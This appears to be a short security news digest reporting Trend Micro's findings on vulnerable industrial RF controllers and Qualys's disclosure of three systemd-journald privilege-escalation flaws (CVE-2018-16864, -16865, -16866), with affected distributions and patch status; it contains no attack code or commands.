      We’ve seen how trivial it is to hack a key fob or a wireless keyboard, and it's not much more difficult to hack a controller for large machinery. This week, Trend Micro released a report on how pervasive and vulnerable RF controllers are in the industrial world and they found that garage door openers are more secure than industrial RF controllers. Potential attack vectors might be as simple as a replay attack, where the attacker sniffs the RF packets and sends them back to the machine to gain control—something any script kiddie could do. From there the attacker could modify packets to inject commands.
     Another relatively simple attack is called e-stop abuse, where the emergency stop command is replayed to the machine until it causes a denial-of-service (DoS). This could bring an entire factory to a grinding halt or disrupt safety mechanisms, putting workers in danger.
On the other end of the spectrum is a more difficult and more remote attack vector. An advanced hacker could remotely rewrite the firmware on a remote control with their own malicious code in order to gain and maintain access. This impacts all of the vendors tested by Trend Micro that support reprogramming on their devices. Researchers also noted that none of those devices had authentication implemented.
    The vulnerabilities discovered have been reported to the manufacturers in the hopes that those companies will take a closer look at the security of their devices. It remains to be seen whether any changes will be made. Physical security is usually very good at manufacturing and construction sites, possibly thwarting a local attack, but it's never one hundred percent. A determined hacker will find a way and industry provides a large attack surface with many possibilities. 
Sources: even_cranes_are_hackable_trend_micro/

Flaws in Systemd Privilege Escalation in almost all of the systemd based Linux distros

     Researchers at Qualys have revealed three security vulnerabilities in a component of systemd. This is believed to affect almost all of the systemd-based Linux distros. The silver lining is that most of the distros have been made aware of the issue and have been working on fixes for these exploits.
     The vulnerabilities are, respectively, CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866. Patches should be appearing in repos soon, which has been attributed to coordinated disclosure by Qualys. Debian will remain vulnerable for the time being; however, according to The Register, Qualys’s Jimmy Graham has said “that they are aware of the issue and we should be seeing a fix soon.”
     The bugs were found in systemd-journald, the systemd component that handles the collection and storage of logs. The first two, CVE-2018-16864 and CVE-2018-16865, are memory corruption flaws. CVE-2018-16864 can be leveraged by malware to crash and potentially hijack the systemd-journald service, thereby elevating the attacker's access from a user to root. CVE-2018-16865 and CVE-2018-16866 can be used together by a local attacker to crash or hijack the root-privileged journal service.
     These exploits are believed to affect almost all of the systemd-based Linux distros in use today. However, SUSE Linux Enterprise, openSUSE Leap 15.0, and Fedora 28 & 29 do not seem to be affected. This is thought to be because their user-land code is compiled with GCC’s -fstack-clash-protection.
     CVE-2018-16864 entered the code base in April of 2013, then became exploitable with systemd v203 in Feb 2016. CVE-2018-16865 seems to have appeared in the code base in 2011 in systemd v38 and became exploitable in April 2013 (systemd v201). CVE-2018-16866 was introduced in June of 2015. However, it was inadvertently fixed in August of 2018.